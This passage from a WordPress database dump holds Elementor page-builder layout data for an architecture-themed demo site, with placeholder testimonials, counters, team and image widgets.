flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3070,4748,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3071,4748,'_elementor_pro_version','3.8.1'),(3072,4748,'_elementor_css','a:6:{s:4:\"time\";i:1670315124;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3074,4749,'_wp_page_template','elementor_header_footer'),(3075,4749,'_elementor_edit_mode','builder'),(3076,4749,'_elementor_template_type','wp-page'),(3077,4749,'_elementor_version','3.8.1'),(3078,4749,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top 